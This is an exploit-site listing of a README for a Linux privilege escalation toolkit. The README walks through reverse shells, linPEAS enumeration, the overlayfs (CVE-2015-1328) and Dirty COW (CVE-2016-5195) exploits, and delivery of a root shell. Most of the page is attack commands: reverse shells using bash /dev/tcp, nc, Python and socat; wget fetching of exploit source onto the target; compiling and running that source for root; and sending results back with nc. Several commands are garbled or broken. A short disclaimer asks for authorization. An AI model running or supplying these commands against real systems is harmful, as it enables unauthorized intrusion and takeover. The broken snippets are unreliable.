Exploit for linux-privesc-linpeas CVE-2015-1328 CVE-2016-5195

Name: Exploit for linux-privesc-linpeas CVE-2015-1328 CVE-2016-5195
Rating: 5 (8 reviews)
2026-06-12 | CVSS 7.8
## https://sploitus.com/exploit?id=01066642-42B4-57AB-A419-1FB04F7914B5
# 🐧 linux-privesc-linpeas

> End-to-end Linux privilege escalation toolset — suitable for penetration testing, CTF challenges, and red team evaluations.

[![GitHub](https://img.shields.io/badge/GitHub-mcc0624%2Flinux--privesc--linpeas-blue)](https://github.com/mcc0624/linux-privesc-linpeas)
[![License](https://img.shields.io/badge/license-MIT-green)](LICENSE)
[![Platform](https://img.shields.io/badge/platform-Linux-lightgrey)]

---

## 📋 Overview

Automated Linux privilege escalation workflow, covering the entire chain from **receiving a reverse shell → information gathering → vulnerability analysis → exploit execution → successful privilege escalation**:

```
Target reverse shell
       ↓
  ┌─ Receiving the shell (6767) ───────────────────┐
  │ socat / nc listening                       │
  └──────────────┬────────────────────────┛
                 ↓
  ┌─ Asset enumeration ────────────────────────────┐
  │ linPEAS automatically uploaded and executed         │
  │ linux-exploit-suggester assisted verification     │
  └──────────────┬────────────────────────┛
                 ↓
  ┌─ Result analysis ────────────────────────────┐
  │ extracting CVEs, SUIDS, sudo commands, passwords   │
  │ matching exploits available for kernel versions     │
  └──────────────┬────────────────────────┛
                 ↓
  ┌─ CVE testing & privilege escalation ──────────┐
  │ overlayfs (CVE-2015-1328)                   │
  │ Dirty COW (CVE-2016-5195)                    │
  │ more CVEs tested by priority order          │
  └──────────────┬────────────────────────┛
                 ↓
  ┌─ Delivery ─────────────────────────────┐
  │ root shell → specified listening port    │
  │ PoC code + usage instructions              │
  └────────────────────────────────────┛

---

## 🚀 Quick Start

### Environment requirements (Local machine — Kali/Killer machine)

```bash
# Dependency check
which socat nc python3 curl wget tmux gcc 2>/dev/null || echo "Missing components need installation"

# One-click deployment
bash & /dev/tcp//6767 0>&1

# Netcat (support for -e option)
nc -e /bin/bash 6767

# Netcat (without -e option)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 6767 >/tmp/f

# Python
python3 -c '
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 6767)
os.dup2(s.fileno(0), 0)
os.dup2(s.fileno(1), 1)
os.dup2(s.fileno(2), 2)
subprocess.call["/bin/sh", "-i")
'

# Socat
socat TCP::6767 EXEC:/bin/bash
'

```

### Step 2: Upload linPEAS

```bash
# Download and execute on the target machine
wget -q http://:8888/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
./linpeas.sh | tee /tmp/peas-out.txt
```

### Step 3: Obtain analysis results

```bash
# Method 1 — Netcat transfer (Recommended)
# On local machine:
nc -lvp 9996 > /tmp/target_peas.txt &
# On target machine:
nc 9996 9997/upload
```

### Step 4: Analyze results

```bash
# Use analysis script
python3 scripts/analyze_peas.py /tmp/target_peas.txt
```

Or manually follow these steps:

| 🔍 Key points | 🛠 Commands |
|---------------|-------------|

| Kernel Version | `uname -a` |
| Distribution | `cat /etc/os-release` |
| CVE List | `grep -iE 'CVE-[0-9]{4}' /tmp/peas-out.txt` |
| SUID Files | `find / -perm -4000 -type f 2>/dev/null` |
| sudo Configuration | `sudo -l` |
| Cron Tasks | `ls -la /etc/cron*` |
| writable passwd | `ls -la /etc/passwd /etc/shadow` |
| Empty MySQL Password | `mysql -u root -e 'select version()'` |

### Step 5: Privilege Escalation

#### overlayfs (CVE-2015-1328) — ⭐ Most stable

```bash
# Target machine
wget -q http://:8888/ofs.c -O /tmp/ofs.c
gcc /tmp/ofs.c -o /tmp/ofs
/tmp/ofs
id   # → uid=0(root) ✅
```

Applicable to: Ubuntu 12.04/14.04, kernel 3.13.0-3.19.0

#### Dirty COW (CVE-2016-5195) — ⭐ Most versatile

```bash
# Target machine
wget -q http://:8888/dirtycow.c -O /tmp/dirty.c
gcc -pthread /tmp/dirty.c -o /tmp/dirty -lcrypt
/tmp/dirty mynewpass
su firefart  # Password: mynewpass
id   # → uid=0(root) ✅

# Clean up
cp /tmp/passwd.bak /etc/passwd
```

Applicable to: Kernel 2.6.22-4.8.3, almost all mainstream Linux distributions

### Step 6: Receiving a Root Shell

After gaining privilege, reverse-engineer a root shell:

```bash
# Local machine (another terminal):
nc -lvnp 8989

# Target machine (after privilege escalation):
bash -i >& /dev/tcp//8989 0>&1

# Or use Python method:
python -c '
import socket,subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect('', 8989)
os.dup2(s.fileno(0), 0)
os.dup2(s.fileno(0), 1)
os.dup2(s.fileno(0), 2)
subprocess.call["/bin/sh", "-i")
'
```

---

## 🛠 Assistant Script Instructions

### `setup_listener.sh` — One-click deployment

```bash
chmod +x setup_listener.sh
./setup_listener.sh [Listener Port] [HTTP Port] [Reverse Shell Port]
# Default: 6767 8888 8989
```

Automated actions:
- Download linPEAS, exploit-suggester, CVE exploit source code
- Start tmux socat listening
- Start HTTP file service
- Print list of available files on the target machine

### `analyze_peas.py` — Automatic analysis

```bash
python3 analyze_peas.py /tmp/peas-output.txt
```

Extract information:
- Kernel version / Distribution
- All matching CVE IDs
- SUID/SGID files
- sudo permissions configuration
- Cron tasks
- Writable directories
- Sensitive information (passwords, keys, MySQL)

### `recv_post.py` — File reception

```bash
python3 recv_post.py [Port] [Output Path]
# Default: 9997 /tmp/recv_file.txt
```

Automatically exits after receiving one POST request. ---

## ⚠️ Safety Notes

1. **This tool is only for legitimate authorization testing.** Unauthorized use may violate laws. 2. **Back up important data.** Some exploits may cause system instability or data loss. 3. **Clean up traces.** After gaining privilege, clean up temporary files promptly (refer to cleaning commands in `references/CVE_QUICK_REF.md`). 4. **Understand the consequences.** Ensure written authorization before using in a real production environment. ---

## 📚 Technical References

| Resource | Link |
|--------|--------|
| linPEAS / PEASS-ng | https://github.com/peass-ng/PEASS-ng |
| Linux Exploit Suggester | https://github.com/mzet-/linux-exploit-suggester |
| HackTricks Linux PrivEsc | https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html |
| Exploit Database | https://www.exploit-db.com |
| CVE-2015-1328 Details | https://nvd.nist.gov/vuln/detail/CVE-2015-1328 |
| CVE-2016-5195 Details | https://nvd.nist.gov/vuln/detail/CVE-2016-5195 |

---

## 📄 License

[MIT](LICENSE)

---

**Just booted a machine? Next step is to escalate privileges. This tool helps you reduce the number of commands needed.**